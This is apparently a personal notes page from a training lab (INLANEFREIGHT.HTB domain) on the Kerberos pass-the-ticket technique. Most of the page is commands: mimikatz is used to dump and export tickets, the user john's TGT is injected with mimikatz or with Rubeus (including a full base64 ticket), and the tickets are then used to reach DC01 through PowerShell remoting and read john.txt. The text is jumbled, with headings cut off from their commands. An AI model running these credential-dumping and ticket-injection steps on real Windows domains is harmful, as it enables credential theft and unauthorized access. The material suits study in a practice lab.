June 11, 2024
mimikatz.exe
privilege::debug
sekurlsa::tickets /export
exit
# Then
dir *.kirbi
Now we can perform pass the ticket
First we have to enter powershell
Then we can access the DC01
ORRRRR FASTER WAY TO VIEW THE .txt FILE
To read the john.txt in john directory
Now we are going to try rubues.exe
Now we can view the files from dc01 john
We can also connect via powershell
You could also do it like this
Last updated
cd C:\tools
mimikatz.exe
privilege::debug
# We are selecting john ticket to get access to john files
# Just copy the john tgt from above
kerberos::ptt "C:\tools\[0;50629]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi"
exitpowershell
Enter-PSSession -ComputerName DC01
whoami
hostname
dir \\DC01.inlanefreight.htb\john
more \\DC01.inlanefreight.htb\john\john.txt# After you exited from the mimikatz
# You can now directly view it
more \\DC01.inlanefreight.htb\john\john.txt# First we have to connect to DC01
powershell
Enter-PSSession -ComputerName DC01
cd C:\john
dir
more john.txtRubeus.exe dump /nowrapRubeus.exe ptt /ticket:doIFqDCCBaSgAwIBBaEDAgEWooIEojCCBJ5hggSaMIIElqADAgEFoRMbEUlOTEFORUZSRUlHSFQuSFRCoiYwJKADAgECoR0wGxsGa3JidGd0GxFJTkxBTkVGUkVJR0hULkhUQqOCBFAwggRMoAMCARKhAwIBAqKCBD4EggQ6esRMTocuikUkpg/PZK0uVC7ojIIiDZKZBFs1u53oP6KhbK85HrfTyuf6Jy/eNcc02gwUh4jk9U7soafnYAcofU8nYGdo+YXhL4zGSJZ1oEontl4Kcc9LX5z2VIu5R8yMQ8GFNAwJvJn4ELmnK46siGMr6KdTEHdyzZx1b9K6Xd3UrU03iqJSl5qNebu1krKA8knXIznpwLicItUunZulTZdz4q8oRYcy5nZbkUb8yPcrJnQJrpuhPPdcy+/lqZ50YmuW3HwixwydhqBJU9bQth/d4/amMoqdPQdmndufrmfzJFgDOXNlzn4uGnNOj7plf1c7UCD3zAokDPtUd1qU4IE5/LaJ/Dz0vy8JOIPKOQm5cZBVrUs9miPX8wS3qRATTLCUvtncv3RxMKVrNtzphdn9FxaK4SRZaXA4BIqYN7yWHnHRA/y2qnW5TSAOuzLfA1wp0J2uw5Id7b9tC47h1kjJO3m1hkgfMNvj19NJe9/qosJz4hCvXxcl5R666C8MNDNXLqfUZrQJW48pvur9M9l4LMrQsMd+BFBPvMEI6cgoZxBoZoLxxc+DvE9jolY4f7UyYk+ny/wrdVIhZ4mwm/1Fgd5SN9KqEs4mzV1T9J/0jvGiPD6Lx/GRAbZcVyHz3uRASRX0XwpdddRKmVXTafc1uUbbtdsF+FRp4aiNaG84GRj3tM47h8hFmC7reqZ7NXUYFM6Ng70NH4co4avHDodzsFW+W2mM3tBOrF7mVia5ahcV3FUeKuBurYVuyt10AFSakuv6cYc2FKeDVG/G/r/zrWQsyMfBW2IWNVIEYiaG1SIYfpXrDD+afKIqpKdqAfycFp13OWUmt5FHjvKorEG7UmPeuE762yZOnqRvAAni6wcYNmbHdd9a/aoH8qaPAl9Ek32UXXXSTt6ZDDkyGi0n8lB/faSATTzcVPmjvTcl40of9ni3isdkjTCv1PA3U7dKtVR9MD0qmJxIXarZmbZu0oeTmB5piIBRKNOHWdZIflSYVHpEfxlCPR976x6x7kWo7DSyCjGjIb2EX2oMwUnpVN/JP4iuodKlOL3TlA5VwMa5JD7UHYbq4vrEP5NPxhmsN1utMl3oS5b1pJZP3Inf6tsbusO+ifh6k3eVL7SH35h9YAzltkfG2SRq/xw4/aN4JHIiKrbvtCsqMyAQndfCKNnQTBB4MvO3nevoOuCWtDgaIKTOF9M90RzCRCkP1zB56W+nfMaKhBGpZMaCbAlZZ6kw6JDnvyOSXC0sqQbBKrPJrpC4gI1P6ZjiNNwtec/X1mlAC/DiDCt7Uy/pMNLHD3nFSd+uVDgAz/5eGcFYU++LeltkpOWVf6FUR+ZEz+z60i4ENj4WuajBAKg22Duy5rw+eEFjUlokT3h1B4PRy3VScqTytJXH/igFg1M9NZflEADBr2bCtwOQ8XF1NIb8H8gX7swkbQWjgfEwge6gAwIBAKKB5gSB432B4DCB3aCB2jCB1zCB1KArMCmgAwIBEqEiBCDjcb9/z3WmEcYBV6i95Drsuv74vD6kwLK57FRnusmbCqETGxFJTkxBTkVGUkVJR0hULkhUQqIRMA+gAwIBAaEIMAYbBGpvaG6jBwMFAEDhAAClERgPMjAyNDA2MTEwNjE0MzFaphEYDzIwMjQwNjExMTYxNDMxWqcRGA8yMDI0MDYxODA2MTQzMVqoExsRSU5MQU5FRlJFSUdIVC5IVEKpJjAkoAMCAQKhHTAbGwZrcmJ0Z3QbEUlOTEFORUZSRUlHSFQuSFRCdir \\DC01.inlanefreight.htb\john
more \\DC01.inlanefreight.htb\john\john.txtpowershell
Enter-PSSession -ComputerName DC01
whoami
hostname
more C:\john\john.txt# First we have to get the .kirbi file from mimikatz
# Then we will just use ptt options of rebeus
Rubeus.exe ptt /ticket:[0;50629]-2-0-40e10000-john@krbtgt-INLANEFREIGHT.HTB.kirbi
# Then we can now read the john.txt from dc01
more \\DC01.inlanefreight.htb\john\john.txt